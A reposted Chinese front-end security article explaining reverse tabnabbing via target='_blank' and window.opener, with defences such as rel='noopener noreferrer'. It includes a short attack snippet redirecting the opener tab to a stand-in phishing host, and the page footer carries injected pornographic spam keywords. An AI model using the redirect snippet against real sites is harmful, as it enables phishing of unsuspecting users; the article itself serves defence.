你不曾察覺的隱患：危險(xiǎn)的 target="_blank" 與 “opener”

venmos 發(fā)布于2019-08-02 16:05 / 2636人閱讀

摘要：惡意網(wǎng)站根據(jù)來偽造一個(gè)足以欺騙用戶的頁面，并展示出來期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性。而如果在鏈接中加入了，則此時(shí)兩個(gè)標(biāo)簽頁將會互不干擾，使得原頁面的性能不會受到新頁面的影響。

在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于"_blank" 屬性。
然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。

起源 parent 與 opener

在說 opener 之前，可以先聊聊 </b> 中的 <b>parent</b>。</p> <p>我們知道，在 <b><iframe></b> 中提供了一個(gè)用于父子頁面交互的對象，叫做 <b>window.parent</b>，我們可以通過 <b>window.parent</b> 對象來從框架中的頁面訪問父級頁面的 <b>window</b>。</p> <p><b>opener</b> 與 <b>parent</b> 一樣，只不過是用于 <b><a target="_blank"></b> 在新標(biāo)簽頁打開的頁面的。通過 <b><a target="_blank"></b> 打開的頁面，可以直接使用 <b>window.opener</b> 來訪問來源頁面的 <b>window</b> 對象。</p> <b>同域與跨域</b> <p>瀏覽器提供了完整的跨域保護(hù)，在域名相同時(shí)，<b>parent</b> 對象和 <b>opener</b> 對象實(shí)際上就直接是上一級的 <b>window</b> 對象；而當(dāng)域名不同時(shí)，<b>parent</b> 和 <b>opener</b> 則是經(jīng)過包裝的一個(gè) <b>global</b> 對象。這個(gè) <b>global</b> 對象僅提供非常有限的屬性訪問，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪問的（訪問會直接拋出 <b>DOMException</b>）。</p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbg33S?w=729&h=42");</script></p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbg33T?w=729&h=42");</script></p> <p>在 <b><iframe></b> 中，提供了一個(gè) <b>sandbox</b> 屬性用于控制框架中的頁面的權(quán)限，因此即使是同域，也可以控制 <b><iframe></b> 的安全性。</p> <b>利用</b> <p>如果，你的網(wǎng)站上有一個(gè)鏈接，使用了 <b>target="_blank"</b>，那么一旦用戶點(diǎn)擊這個(gè)鏈接并進(jìn)入一個(gè)新的標(biāo)簽，新標(biāo)簽中的頁面如果存在惡意代碼，就可以將你的網(wǎng)站直接導(dǎo)航到一個(gè)虛假網(wǎng)站。此時(shí)，如果用戶回到你的標(biāo)簽頁，看到的就是被替換過的頁面了。</p> <b>詳細(xì)步驟</b> <p> <p>在你的網(wǎng)站 <b>https://example.com</b> 上存在一個(gè)鏈接：</p> <pre><a target="_blank">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> </p> <p> <p>用戶點(diǎn)擊了這個(gè)鏈接，在新的標(biāo)簽頁打開了這個(gè)網(wǎng)站。這個(gè)網(wǎng)站可以通過 HTTP Header 中的 <b>Referer</b> 屬性來判斷用戶的來源。</p> <p>并且，這個(gè)網(wǎng)站上包含著類似于這樣的 JavaScript 代碼：</p> <pre>const url = encodeURIComponent("{{header.referer}}"); window.opener.location.replace("https://a.fake.site/?" + url);</pre> </p> <p>此時(shí)，用戶在繼續(xù)瀏覽這個(gè)新的標(biāo)簽頁，而原來的網(wǎng)站所在的標(biāo)簽頁此時(shí)已經(jīng)被導(dǎo)航到了 <b>https://a.fake.site/?https%3A%2F%2Fexample.com%2F</b>。</p> <p>惡意網(wǎng)站 <b>https://a.fake.site</b> 根據(jù) Query String 來偽造一個(gè)足以欺騙用戶的頁面，并展示出來（期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性）。</p> <p>用戶關(guān)閉 <b>https://an.evil.site</b> 的標(biāo)簽頁，回到原來的網(wǎng)站………………已經(jīng)回不去了。</p> <pre>上面的攻擊步驟是在跨域的情況下的，在跨域情況下，<b>opener</b> 對象和 <b>parent</b> 一樣，是受到限制的，僅提供非常有限的屬性訪問，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪問的（訪問會直接拋出 <b>DOMException</b>）。<p>但是與 <b>parent</b> 不同的是，<strong>在跨域的情況下，<b>opener</b> 仍然可以調(diào)用 <b>location.replace</b> 方法</strong>而 <b>parent</b> 則不可以。</p> <p>如果是在同域的情況下（比如一個(gè)網(wǎng)站上的某一個(gè)頁面被植入了惡意代碼），則情況要比上面嚴(yán)重得多。</p> </pre> <b>防御</b> <p><b><iframe></b> 中有 <b>sandbox</b> 屬性，而鏈接，則可以使用下面的辦法：</p> <b>1. Referrer Policy 和 noreferrer</b> <p>上面的攻擊步驟中，用到了 HTTP Header 中的 <b>Referer</b> 屬性，實(shí)際上可以在 HTTP 的響應(yīng)頭中增加 <b>Referrer Policy</b> 頭來保證來源隱私安全。</p> <p><b>Referrer Policy</b> 需要修改后端代碼來實(shí)現(xiàn)，而在前端，也可以使用 <b><a></b> 標(biāo)簽的 <b>rel</b> 屬性來指定 <b>rel="noreferrer"</b> 來保證來源隱私安全。</p> <pre><a target="_blank" rel="noreferrer">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <pre>但是要注意的是：即使限制了 <b>referer</b> 的傳遞，仍然不能阻止原標(biāo)簽被惡意跳轉(zhuǎn)。</pre> <b>2. noopener</b> <p>為了安全，現(xiàn)代瀏覽器都支持在 <b><a></b> 標(biāo)簽的 <b>rel</b> 屬性中指定 <b>rel="noopener"</b>，這樣，在打開的新標(biāo)簽頁中，將無法再使用 <b>opener</b> 對象了，它為設(shè)置為了 <b>null</b>。</p> <pre><a target="_blank" rel="noopener">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <b>3. JavaScript</b> <p><b>noopener</b> 屬性看似是解決了所有問題，但是...瀏覽器的兼容性問題...</p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbg33Y?w=1200&h=814");</script></p> <p>可以看到，現(xiàn)在絕大多數(shù)瀏覽器都已經(jīng)兼容了 <b>rel="noopener"</b> 屬性了。但是，為了保護(hù)稍舊的“近代”瀏覽器或是很舊的“古代”瀏覽器甚至是“遠(yuǎn)古”瀏覽器，只有 <b>noopener</b> 屬性還是遠(yuǎn)遠(yuǎn)不夠的。</p> <p>這時(shí)，就只能請出下面這段原生 JavaScript 來幫忙了。</p> <pre>"use strict"; function openUrl(url) { var newTab = window.open(); newTab.opener = null; newTab.location = url; }</pre> <b>推薦</b> <p>首先，在網(wǎng)站中的鏈接上，如果使用了 <b>target="_blank"</b>，就要帶上 <b>rel="noopener"</b>，并且建議帶上 <b>rel="noreferrer"</b>。類似于這樣：</p> <pre><a target="_blank" rel="noopener noreferrer">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <p>當(dāng)然，在跳轉(zhuǎn)到第三方網(wǎng)站的時(shí)候，為了 SEO 權(quán)重，還建議帶上 <b>rel="nofollow"</b>，所以最終類似于這樣：</p> <pre><a target="_blank" rel="noopener noreferrer nofollow">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <b>性能</b> <p>最后，再來說說性能問題。</p> <p>如果網(wǎng)站使用了 <b><a target="_blank"></b>，那么新打開的標(biāo)簽頁的性能將會影響到當(dāng)前頁面。此時(shí)如果新打開的頁面中執(zhí)行了一個(gè)非常龐大的 JavaScript 腳本，那么原始標(biāo)簽頁也會受到影響，會出現(xiàn)卡頓的現(xiàn)象（當(dāng)然不至于卡死）。</p> <p>而如果在鏈接中加入了 <b>noopener</b>，則此時(shí)兩個(gè)標(biāo)簽頁將會互不干擾，使得原頁面的性能不會受到新頁面的影響。</p> <hr> <pre>文 / jinliming2<br>一條對新鮮事物充滿了好奇心的咸魚<p>編 / 熒聲</p> </pre> <p>本文已由作者授權(quán)發(fā)布，版權(quán)屬于創(chuàng)宇前端。歡迎注明出處轉(zhuǎn)載本文。本文鏈接：https://knownsec-fed.com/2018...</p> <p>想要訂閱更多來自知道創(chuàng)宇開發(fā)一線的分享，請搜索關(guān)注我們的微信公眾號：創(chuàng)宇前端（KnownsecFED）。歡迎留言討論，我們會盡可能回復(fù)。</p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbgVle?w=296&h=295");</script></p> <p>歡迎點(diǎn)贊、收藏、留言評論、轉(zhuǎn)發(fā)分享和打賞支持我們。打賞將被完全轉(zhuǎn)交給文章作者。</p> <p>感謝您的閱讀。</p> </div> <div id="qoyqs8suu2u" class="mt-64 tags-seach" > <div id="qoyqs8suu2u" class="tags-info"> <a style="width:120px;" title="GPU云服務(wù)器" href="http://systransis.cn/site/product/gpu.html">GPU云服務(wù)器</a> <a style="width:120px;" title="云服務(wù)器" href="http://systransis.cn/site/active/kuaijiesale.html?ytag=seo">云服務(wù)器</a> <a style="width:120px;" title="target_blank" href="http://systransis.cn/yun/tag/target_blank/">target_blank</a> <a style="width:120px;" title="Quote" href="http://systransis.cn/yun/tag/Quote/">Quote</a> <a style="width:120px;" title="quoted" href="http://systransis.cn/yun/tag/quoted/">quoted</a> <a style="width:120px;" title="quot" href="http://systransis.cn/yun/tag/quot/">quot</a> </div> </div> <div id="qoyqs8suu2u" class="entry-copyright mb-30"> <p class="mb-15"> 文章版權(quán)歸作者所有，未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為，您可以聯(lián)系管理員刪除。</p> <p>轉(zhuǎn)載請注明本文地址：http://systransis.cn/yun/54653.html</p> </div> <ul class="pre-next-page"> <li id="qoyqs8suu2u" class="ellipsis"><a class="hpf" href="http://systransis.cn/yun/54652.html">上一篇：Slog65_項(xiàng)目上線之ArthurSlog個(gè)人網(wǎng)站上線4</a></li> <li id="qoyqs8suu2u" class="ellipsis"><a class="hpf" href="http://systransis.cn/yun/54654.html">下一篇：前端每日實(shí)戰(zhàn)：137# 視頻演示如何用純 CSS 創(chuàng)作一個(gè)抽象的水波蕩漾的動畫</a></li> </ul> </div> <div id="qoyqs8suu2u" class="about_topicone-mid"> <h3 class="top-com-title mb-0"><span data-id="0">相關(guān)文章</span></h3> <ul class="com_white-left-mid atricle-list-box"> <li> <div id="qoyqs8suu2u" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://systransis.cn/yun/97826.html"><b><em>你</em><em>不曾</em><em>察覺</em><em>的</em><em>隱患</em>：<em>危險(xiǎn)</em><em>的</em> <em>target</em>=&<em>quot</em>;<em>_</em><em>blank</em>&<em>quot</em>; <em>與</em> “<em>opener</em>”</b></a></h2> <p class="ellipsis2 good">摘要：惡意網(wǎng)站根據(jù)來偽造一個(gè)足以欺騙用戶的頁面，并展示出來期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性。而如果在鏈接中加入了，則此時(shí)兩個(gè)標(biāo)簽頁將會互不干擾，使得原頁面的性能不會受到新頁面的影響。在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于_blank 屬性。然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。 s...</p> <div id="qoyqs8suu2u" class="com_white-left-info"> <div id="qoyqs8suu2u" class="com_white-left-infol"> <a href="http://systransis.cn/yun/u-493.html"><img src="http://systransis.cn/yun/data/avatar/000/00/04/small_000000493.jpg" alt=""><span id="qoyqs8suu2u" class="layui-hide64">EsgynChina</span></a> <time datetime="">2019-08-23 12:00</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> <li> <div id="qoyqs8suu2u" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://systransis.cn/yun/11421.html"><b><em>你</em><em>不曾</em><em>察覺</em><em>的</em><em>隱患</em>：<em>危險(xiǎn)</em><em>的</em> <em>target</em>=&<em>quot</em>;<em>_</em><em>blank</em>&<em>quot</em>; <em>與</em> “<em>opener</em>”</b></a></h2> <p class="ellipsis2 good">摘要：惡意網(wǎng)站根據(jù)來偽造一個(gè)足以欺騙用戶的頁面，并展示出來期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性。而如果在鏈接中加入了，則此時(shí)兩個(gè)標(biāo)簽頁將會互不干擾，使得原頁面的性能不會受到新頁面的影響。在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于_blank 屬性。然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。 s...</p> <div id="qoyqs8suu2u" class="com_white-left-info"> <div id="qoyqs8suu2u" class="com_white-left-infol"> <a href="http://systransis.cn/yun/u-522.html"><img src="http://systransis.cn/yun/data/avatar/000/00/05/small_000000522.jpg" alt=""><span id="qoyqs8suu2u" class="layui-hide64">jackwang</span></a> <time datetime="">2019-06-21 16:49</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> <li> <div id="qoyqs8suu2u" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://systransis.cn/yun/109770.html"><b>優(yōu)秀博文收藏（不定期更新）</b></a></h2> <p class="ellipsis2 good">摘要：我的書簽我的書簽謹(jǐn)慎導(dǎo)入，小心覆蓋工具類版本管理快速切換源配置教程指南可視化工具前端工具集前端助手網(wǎng)絡(luò)封包截取工具格式化工具標(biāo)注工具模擬請求類深入淺出布局你所不知道的動畫技巧與細(xì)節(jié)常用代碼黑魔法小技巧，讓你少寫不必要的，代碼更優(yōu)雅一勞永我的書簽我的書簽（謹(jǐn)慎導(dǎo)入，小心覆蓋）工具類 nvm: node版本管理 nrm: 快速切換npm源 shell: zsh+on-my-zsh配...</p> <div id="qoyqs8suu2u" class="com_white-left-info"> <div id="qoyqs8suu2u" class="com_white-left-infol"> <a href="http://systransis.cn/yun/u-1105.html"><img src="http://systransis.cn/yun/data/avatar/000/00/11/small_000001105.jpg" alt=""><span id="qoyqs8suu2u" class="layui-hide64">sunsmell</span></a> <time datetime="">2019-08-26 13:54</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> <li> <div id="qoyqs8suu2u" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://systransis.cn/yun/114679.html"><b>優(yōu)秀博文收藏（不定期更新）</b></a></h2> <p class="ellipsis2 good">摘要：我的書簽我的書簽謹(jǐn)慎導(dǎo)入，小心覆蓋工具類版本管理快速切換源配置教程指南可視化工具前端工具集前端助手網(wǎng)絡(luò)封包截取工具格式化工具標(biāo)注工具模擬請求類深入淺出布局你所不知道的動畫技巧與細(xì)節(jié)常用代碼黑魔法小技巧，讓你少寫不必要的，代碼更優(yōu)雅一勞永我的書簽我的書簽（謹(jǐn)慎導(dǎo)入，小心覆蓋）工具類 nvm: node版本管理 nrm: 快速切換npm源 shell: zsh+on-my-zsh配...</p> <div id="qoyqs8suu2u" class="com_white-left-info"> <div id="qoyqs8suu2u" class="com_white-left-infol"> <a href="http://systransis.cn/yun/u-191.html"><img src="http://systransis.cn/yun/data/avatar/000/00/01/small_000000191.jpg" alt=""><span id="qoyqs8suu2u" class="layui-hide64">zhangfaliang</span></a> <time datetime="">2019-08-30 10:57</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> </ul> </div> <div id="qoyqs8suu2u" class="topicone-box-wangeditor"> <h3 class="top-com-title mb-64"><span>發(fā)表評論</span></h3> <div id="qoyqs8suu2u" class="xcp-publish-main flex_box_zd"> <div id="qoyqs8suu2u" class="unlogin-pinglun-box"> <a href="javascript:login()" class="grad">登陸后可評論</a> </div> </div> </div> <div id="qoyqs8suu2u" class="site-box-content"> <div id="qoyqs8suu2u" class="site-content-title"> <h3 class="top-com-title mb-64"><span>0條評論</span></h3> </div> <div id="qoyqs8suu2u" class="pages"></ul></div> </div> </div> <div id="qoyqs8suu2u" class="layui-col-md4 layui-col-lg3 com_white-right site-wrap-right"> <div id="qoyqs8suu2u" class=""> <div id="qoyqs8suu2u" class="com_layuiright-box user-msgbox"> <a href="http://systransis.cn/yun/u-294.html"><img src="http://systransis.cn/yun/data/avatar/000/00/02/small_000000294.jpg" alt=""></a> <h3><a href="http://systransis.cn/yun/u-294.html" rel="nofollow">venmos</a></h3> <h6>男<span>|</span>高級講師</h6> <div id="qoyqs8suu2u" class="flex_box_zd user-msgbox-atten"> <a href="javascript:attentto_user(294)" id="attenttouser_294" class="grad follow-btn notfollow attention">我要關(guān)注</a> <a href="javascript:login()" title="發(fā)私信" >我要私信</a> </div> <div id="qoyqs8suu2u" class="user-msgbox-list flex_box_zd"> <h3 class="hpf">TA的文章</h3> <a href="http://systransis.cn/yun/ut-294.html" class="box_hxjz">閱讀更多</a> </div> <ul class="user-msgbox-ul"> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/122800.html">歐路云：狂歡雙11，新上美國OVH美西AMD Epyc? 3.1主頻 / 自帶500DDOS 防護(hù)，</a></h3> <p>閱讀 2123<span>·</span>2021-11-02 14:48</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/115938.html">CSS基礎(chǔ)-background的那些屬性</a></h3> <p>閱讀 2790<span>·</span>2019-08-30 14:19</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/115470.html">2016百度前端技術(shù)學(xué)院Task02</a></h3> <p>閱讀 2960<span>·</span>2019-08-30 13:19</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/113653.html">vue.js使用echarts一分鐘簡單入門</a></h3> <p>閱讀 1334<span>·</span>2019-08-29 16:17</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/110015.html">G6文檔</a></h3> <p>閱讀 3279<span>·</span>2019-08-26 14:05</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/109937.html">JS設(shè)計(jì)模式學(xué)習(xí)_基礎(chǔ)篇</a></h3> <p>閱讀 3020<span>·</span>2019-08-26 13:58</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/104774.html">手寫一個(gè)符合promise/A+規(guī)范的promise庫</a></h3> <p>閱讀 3106<span>·</span>2019-08-23 18:10</p></li> <li><h3 class="ellipsis"><a href="http://systransis.cn/yun/104611.html">typescript 高級技巧</a></h3> <p>閱讀 1133<span>·</span>2019-08-23 18:04</p></li> </ul> </div>  <div id="qoyqs8suu2u" class="com_layuiright-box"> <h6 class="top-com-title"><span>最新活動</span></h6> <div id="qoyqs8suu2u" class="com_adbox"> <div id="qoyqs8suu2u" class="layui-carousel" id="right-item"> <div carousel-item> <div> <a href="http://systransis.cn/site/active/kuaijiesale.html?ytag=seo" rel="nofollow"> <img src="http://systransis.cn/yun/data/attach/240625/2rTjEHmi.png" alt="云服務(wù)器"> </a> </div> <div> <a href="http://systransis.cn/site/product/gpu.html" rel="nofollow"> <img src="http://systransis.cn/yun/data/attach/240807/7NjZjdrd.png" alt="GPU云服務(wù)器"> </a> </div> </div> </div> </div>  <div id="qoyqs8suu2u" class="adhtml"> </div> <script> $(function(){ $.ajax({ type: "GET", url:"http://systransis.cn/yun/ad/getad/1.html", cache: false, success: function(text){ $(".adhtml").html(text); } }); }) </script> </div> </div> </div> </div> </div> </section>  <div id="qoyqs8suu2u" class="site-tree-mobile layui-hide"> <i class="layui-icon layui-icon-spread-left"></i> </div>  <div id="qoyqs8suu2u" class="site-mobile-shade"></div>  <div class="qoyqs8suu2u" id="payread"> <div id="qoyqs8suu2u" class="layui-form-item">閱讀需要支付1元查看</div> <div id="qoyqs8suu2u" class="layui-form-item"><button class="btn-right">支付并查看</button></div> </div> <script> var prei=0; $(".site-seo-depict pre").each(function(){ var html=$(this).html().replace("<code>","").replace("</code>","").replace('<code class="javascript hljs" codemark="1">',''); $(this).attr('data-clipboard-text',html).attr("id","pre"+prei); $(this).html("").append("<code>"+html+"</code>"); prei++; }) $(".site-seo-depict img").each(function(){ if($(this).attr("src").indexOf('data:image/svg+xml')!= -1){ $(this).remove(); } }) $("LINK[href*='style-49037e4d27.css']").remove(); $("LINK[href*='markdown_views-d7a94ec6ab.css']").remove(); layui.use(['jquery', 'layer','code'], function(){ $("pre").attr("class","layui-code"); $("pre").attr("lay-title",""); $("pre").attr("lay-skin",""); layui.code(); $(".layui-code-h3 a").attr("class","copycode").html("復(fù)制代碼 ").attr("onclick","copycode(this)"); }); function copycode(target){ var id=$(target).parent().parent().attr("id"); var clipboard = new ClipboardJS("#"+id); clipboard.on('success', function(e) { e.clearSelection(); alert("復(fù)制成功") }); clipboard.on('error', function(e) { alert("復(fù)制失敗") }); } //$(".site-seo-depict").html($(".site-seo-depict").html().slice(0, -5)); </script> <link rel="stylesheet" type="text/css" href="http://systransis.cn/yun/static/js/neweditor/code/styles/tomorrow-night-eighties.css"> <script src="http://systransis.cn/yun/static/js/neweditor/code/highlight.pack.js" type="text/javascript"></script> <script src="http://systransis.cn/yun/static/js/clipboard.js"></script> <script>hljs.initHighlightingOnLoad();</script> <script> function setcode(){ var _html=''; document.querySelectorAll('pre code').forEach((block) => { var _tmptext=$.trim($(block).text()); if(_tmptext!=''){ _html=_html+_tmptext; console.log(_html); } }); } </script> <script> function payread(){ layer.open({ type: 1, title:"付費(fèi)閱讀", shadeClose: true, content: $('#payread') }); } // 舉報(bào) function jupao_tip(){ layer.open({ type: 1, title:false, shadeClose: true, content: $('#jubao') }); } $(".getcommentlist").click(function(){ var _id=$(this).attr("dataid"); var _tid=$(this).attr("datatid"); $("#articlecommentlist"+_id).toggleClass("hide"); var flag=$("#articlecommentlist"+_id).attr("dataflag"); if(flag==1){ flag=0; }else{ flag=1; //加載評論 loadarticlecommentlist(_id,_tid); } $("#articlecommentlist"+_id).attr("dataflag",flag); }) $(".add-comment-btn").click(function(){ var _id=$(this).attr("dataid"); $(".formcomment"+_id).toggleClass("hide"); }) $(".btn-sendartcomment").click(function(){ var _aid=$(this).attr("dataid"); var _tid=$(this).attr("datatid"); var _content=$.trim($(".commenttext"+_aid).val()); if(_content==''){ alert("評論內(nèi)容不能為空"); return false; } var touid=$("#btnsendcomment"+_aid).attr("touid"); if(touid==null){ touid=0; } addarticlecomment(_tid,_aid,_content,touid); }) $(".button_agree").click(function(){ var supportobj = $(this); var tid = $(this).attr("id"); $.ajax({ type: "GET", url:"http://systransis.cn/yun/index.php?topic/ajaxhassupport/" + tid, cache: false, success: function(hassupport){ if (hassupport != '1'){ $.ajax({ type: "GET", cache:false, url: "http://systransis.cn/yun/index.php?topic/ajaxaddsupport/" + tid, success: function(comments) { supportobj.find("span").html(comments+"人贊"); } }); }else{ alert("您已經(jīng)贊過"); } } }); }); function attenquestion(_tid,_rs){ $.ajax({ //提交數(shù)據(jù)的類型 POST GET type:"POST", //提交的網(wǎng)址 url:"http://systransis.cn/yun/favorite/topicadd.html", //提交的數(shù)據(jù) data:{tid:_tid,rs:_rs}, //返回?cái)?shù)據(jù)的格式 datatype: "json",//"xml", "html", "script", "json", "jsonp", "text". //在請求之前調(diào)用的函數(shù) beforeSend:function(){}, //成功返回之后調(diào)用的函數(shù) success:function(data){ var data=eval("("+data+")"); console.log(data) if(data.code==2000){ layer.msg(data.msg,function(){ if(data.rs==1){ //取消收藏 $(".layui-layer-tips").attr("data-tips","收藏文章"); $(".layui-layer-tips").html('<i class="fa fa-heart-o"></i>'); } if(data.rs==0){ //收藏成功 $(".layui-layer-tips").attr("data-tips","已收藏文章"); $(".layui-layer-tips").html('<i class="fa fa-heart"></i>') } }) }else{ layer.msg(data.msg) } } , //調(diào)用執(zhí)行后調(diào)用的函數(shù) complete: function(XMLHttpRequest, textStatus){ postadopt=true; }, //調(diào)用出錯(cuò)執(zhí)行的函數(shù) error: function(){ //請求出錯(cuò)處理 postadopt=false; } }); } </script> <footer> <div id="qoyqs8suu2u" class="layui-container"> <div id="qoyqs8suu2u" class="flex_box_zd"> <div id="qoyqs8suu2u" class="left-footer"> <h6><a href="http://systransis.cn/"><img src="http://systransis.cn/yun/static/theme/ukd//images/logo.png" alt="UCloud （優(yōu)刻得科技股份有限公司）"></a></h6> <p>UCloud （優(yōu)刻得科技股份有限公司）是中立、安全的云計(jì)算服務(wù)平臺，堅(jiān)持中立，不涉足客戶業(yè)務(wù)領(lǐng)域。公司自主研發(fā)IaaS、PaaS、大數(shù)據(jù)流通平臺、AI服務(wù)平臺等一系列云計(jì)算產(chǎn)品，并深入了解互聯(lián)網(wǎng)、傳統(tǒng)企業(yè)在不同場景下的業(yè)務(wù)需求，提供公有云、混合云、私有云、專有云在內(nèi)的綜合性行業(yè)解決方案。</p> </div> <div id="qoyqs8suu2u" class="right-footer layui-hidemd"> <ul class="flex_box_zd"> <li> <h6>UCloud與云服務(wù)</h6> <p><a href="http://systransis.cn/site/about/intro/">公司介紹</a></p> <p><a >加入我們</a></p> <p><a href="http://systransis.cn/site/ucan/onlineclass/">UCan線上公開課</a></p> <p><a href="http://systransis.cn/site/solutions.html" >行業(yè)解決方案</a></p> <p><a href="http://systransis.cn/site/pro-notice/">產(chǎn)品動態(tài)</a></p> </li> <li> <h6>友情鏈接</h6> <p><a >GPU算力平臺</a></p> <p><a >UCloud私有云</a></p> <p><a >SurferCloud</a></p> <p><a >工廠仿真軟件</a></p> <p><a >Pinex</a></p> <p><a >AI繪畫</a></p> </li> <li> <h6>社區(qū)欄目</h6> <p><a href="http://systransis.cn/yun/column/index.html">專欄文章</a></p> <p><a href="http://systransis.cn/yun/udata/">專題地圖</a></p> </li> <li> <h6>常見問題</h6> <p><a href="http://systransis.cn/site/ucsafe/notice.html" >安全中心</a></p> <p><a href="http://systransis.cn/site/about/news/recent/" >新聞動態(tài)</a></p> <p><a href="http://systransis.cn/site/about/news/report/">媒體動態(tài)</a></p> <p><a href="http://systransis.cn/site/cases.html">客戶案例</a></p> <p><a href="http://systransis.cn/site/notice/">公告</a></p> </li> <li> <span><img src="https://static.ucloud.cn/7a4b6983f4b94bcb97380adc5d073865.png" alt="優(yōu)刻得"></span> <p>掃掃了解更多</p></div> </div> <div id="qoyqs8suu2u" class="copyright">Copyright ? 2012-2023 UCloud 優(yōu)刻得科技股份有限公司<i>｜</i><a rel="nofollow" >滬公網(wǎng)安備 31011002000058號</a><i>｜</i><a rel="nofollow" ></a> 滬ICP備12020087號-3</a><i>｜</i> <script type="text/javascript" src="https://gyfk12.kuaishang.cn/bs/ks.j?cI=197688&fI=125915" charset="utf-8"></script> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://#/hm.js?290c2650b305fc9fff0dbdcafe48b59d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script>  <script async src="https://www.googletagmanager.com/gtag/js?id=G-DZSMXQ3P9N"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-DZSMXQ3P9N'); </script> <script> (function(){ var el = document.createElement("script"); el.src = "https://lf1-cdn-tos.bytegoofy.com/goofy/ttzz/push.js?99f50ea166557aed914eb4a66a7a70a4709cbb98a54ecb576877d99556fb4bfc3d72cd14f8a76432df3935ab77ec54f830517b3cb210f7fd334f50ccb772134a"; el.id = "ttzz"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(el, s); })(window) </script></div> </div> </footer> <footer> <div class="friendship-link"> <p>感谢您访问我们的网站，您可能还对以下资源感兴趣：</p> <a href="http://systransis.cn/" title="成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费">成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费</a> <div class="friend-links"> </div> </div> </footer> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body><div id="0wmea" class="pl_css_ganrao" style="display: none;"><rt id="0wmea"><tbody id="0wmea"><em id="0wmea"></em></tbody></rt><small id="0wmea"><option id="0wmea"><samp id="0wmea"></samp></option></small><center id="0wmea"></center><xmp id="0wmea"><strike id="0wmea"><rt id="0wmea"></rt></strike></xmp><delect id="0wmea"></delect><delect id="0wmea"><tr id="0wmea"><s id="0wmea"></s></tr></delect><option id="0wmea"></option><dd id="0wmea"><th id="0wmea"><nav id="0wmea"></nav></th></dd><dl id="0wmea"><nav id="0wmea"><li id="0wmea"></li></nav></dl><tfoot id="0wmea"></tfoot><xmp id="0wmea"><tfoot id="0wmea"><input id="0wmea"></input></tfoot></xmp><fieldset id="0wmea"><rt id="0wmea"><noscript id="0wmea"></noscript></rt></fieldset><noframes id="0wmea"></noframes><noframes id="0wmea"></noframes><noscript id="0wmea"></noscript><noscript id="0wmea"></noscript><em id="0wmea"><del id="0wmea"><tfoot id="0wmea"></tfoot></del></em><td id="0wmea"></td><source id="0wmea"></source><del id="0wmea"><dfn id="0wmea"><rt id="0wmea"></rt></dfn></del><noscript id="0wmea"></noscript><object id="0wmea"><li id="0wmea"><button id="0wmea"></button></li></object><abbr id="0wmea"></abbr><acronym id="0wmea"></acronym><code id="0wmea"></code><noframes id="0wmea"></noframes><button 